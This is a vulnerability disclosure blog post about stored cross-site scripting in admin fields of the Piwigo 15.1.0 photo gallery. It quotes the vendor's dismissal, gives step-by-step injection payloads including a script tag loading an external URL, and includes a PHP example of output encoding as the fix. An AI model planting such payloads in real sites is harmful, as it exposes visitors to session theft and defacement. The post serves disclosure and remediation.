Multiple Stored XSS Vulnerabilities in Piwigo 15.1.0

27 Nov 2024   |   ALI İLTIZAR   |   Reading Time: 4 min   |   Views: 115   |   Updated: 27 Nov 2024

Vendor Response

During the disclosure process for the stored XSS vulnerabilities in Piwigo 15.1.0, the development team provided the following response:

"Adding HTML in a photo description is not a security issue. Only administrators can do it. Administrators can do much more intrusive actions. As long as only administrators can do it, it's not a bug."

"The only reason why we would remove HTML from user input for administrators would be to avoid such false security reports. There is absolutely no security reason to do it. Only to get less useless reports like this.

...

I don't see any security issue here."


Introduction

Piwigo, a popular photo gallery application, has been found to contain several stored Cross-Site Scripting (XSS) vulnerabilities in version 15.1.0. These vulnerabilities pose a significant security risk because they allow attackers to inject malicious scripts into various fields, potentially compromising user data and the application's integrity. This blog post outlines the discovered vulnerabilities, their impact, and remediation strategies.


Vulnerabilities Identified

1. Photo Properties Stored XSS

The first vulnerability is in the Photo Properties section under /admin.php?page=photo-1-properties. Malicious payloads injected into fields like Title, Author, or Description are executed on any page where the properties are displayed.

  • Steps to Exploit:
    1. Log in as an administrator.
    2. Navigate to /admin.php?page=photo-1-properties.
    3. Upload an image and edit its properties.
    4. Insert the payload:
      "><img src=x onerror=alert(1)>
    5. Save the settings and visit the image page (e.g., /picture.php?/1/category/6) to trigger the XSS.

2. Tags Management Stored XSS

The second vulnerability resides in the Tags Management section at /admin.php?page=tags. When creating a tag with a malicious payload, the script executes when the tag is displayed.

  • Steps to Exploit:
    1. Log in as an administrator.
    2. Navigate to /admin.php?page=tags.
    3. Create a tag with the payload:
      "><img src=x onerror=alert('tag-xss')>
    4. Assign the tag to an image and view the image page to observe the execution.

3. Gallery Title Stored XSS

On the configuration page (/admin.php?page=configuration&section=main), the "Gallery Title" input field is vulnerable to XSS.

  • Payloads:
    iltosec gallery</title><img src=x onerror=alert('example.com')>
    </title><script src="https://google.com/x.js"></script>

These payloads execute as scripts and can load external malicious resources.

4. Page Banner Stored XSS in "Elegant" Theme

In the "Elegant" theme, the "Page Banner" field renders raw HTML, enabling attackers to inject scripts.

  • Payload:
    <p>Welcome to my photo gallery</p> <img src=x onerror=alert('example.com')>

The injected script runs when the page loads, giving arbitrary JavaScript execution in the browser of every visitor who views the gallery.
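The common root cause above is that admin-supplied values are written into HTML without output encoding. The following is an added example, not Piwigo's own code, that renders the write-up's payloads both raw and with context-specific encoding; the h() helper, the image path and the tag URL layout are assumptions.

```php
<?php
// Added example, not Piwigo's code: the same admin-supplied values rendered raw
// (the behaviour the write-up describes) and with context-specific output encoding.
declare(strict_types=1);

// Constructed sample values using the payloads from the write-up.
$fields = [
    'gallery_title' => "iltosec gallery</title><img src=x onerror=alert('example.com')>",
    'photo_title'   => '"><img src=x onerror=alert(1)>',
    'tag_name'      => '"><img src=x onerror=alert(\'tag-xss\')>',
];

// Encode a value for HTML text or a double-quoted attribute: & < > " ' become entities.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering: values are interpolated straight into the markup, so a
// </title> or "> inside the data closes the current element and starts a new tag.
function render_vulnerable(array $f): string
{
    return "<title>{$f['gallery_title']}</title>\n"
         . "<img alt=\"{$f['photo_title']}\" src=\"/i/1.jpg\">\n"
         . "<a class=\"tag\" href=\"/index.php?/tags/{$f['tag_name']}\">{$f['tag_name']}</a>\n";
}

// Hardened rendering: every value is encoded for the context it lands in, at the
// moment of output (h() for text and attributes, rawurlencode() for a URL path segment).
function render_hardened(array $f): string
{
    return "<title>" . h($f['gallery_title']) . "</title>\n"
         . "<img alt=\"" . h($f['photo_title']) . "\" src=\"/i/1.jpg\">\n"
         . "<a class=\"tag\" href=\"/index.php?/tags/" . rawurlencode($f['tag_name']) . "\">"
         . h($f['tag_name']) . "</a>\n";
}

// True when an injected <img src=x ...> tag survives as real markup in the output
// (an encoded &lt;img src=x ...&gt; is plain text and does not match).
function leaks_markup(string $html): bool
{
    return (bool) preg_match('#<img\s+src=x#i', $html);
}

echo "raw:      ", leaks_markup(render_vulnerable($fields)) ? "payload is live markup" : "clean", "\n";
echo "hardened: ", leaks_markup(render_hardened($fields)) ? "payload is live markup" : "clean", "\n";
echo render_hardened($fields);
```

A field that is meant to hold HTML, such as the theme's page banner, cannot be fixed by encoding alone and needs an allowlist-based HTML sanitizer instead.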

Impact of the Vulnerabilities

The identified vulnerabilities can lead to severe consequences, including:

  • Session Hijacking: Theft of user cookies and session tokens.
  • Defacement: Unauthorized changes to the website's appearance.
  • Injection of Malicious Scripts: Loading external scripts for further exploitation or malware delivery.
  • Data Theft: Access to sensitive information from logged-in users or administrators.

Screenshots

The post includes screenshots demonstrating each vulnerability:

  • Admin Panel XSS in Photo Properties
  • Tag Field XSS
  • Gallery Title XSS
  • Page Banner XSS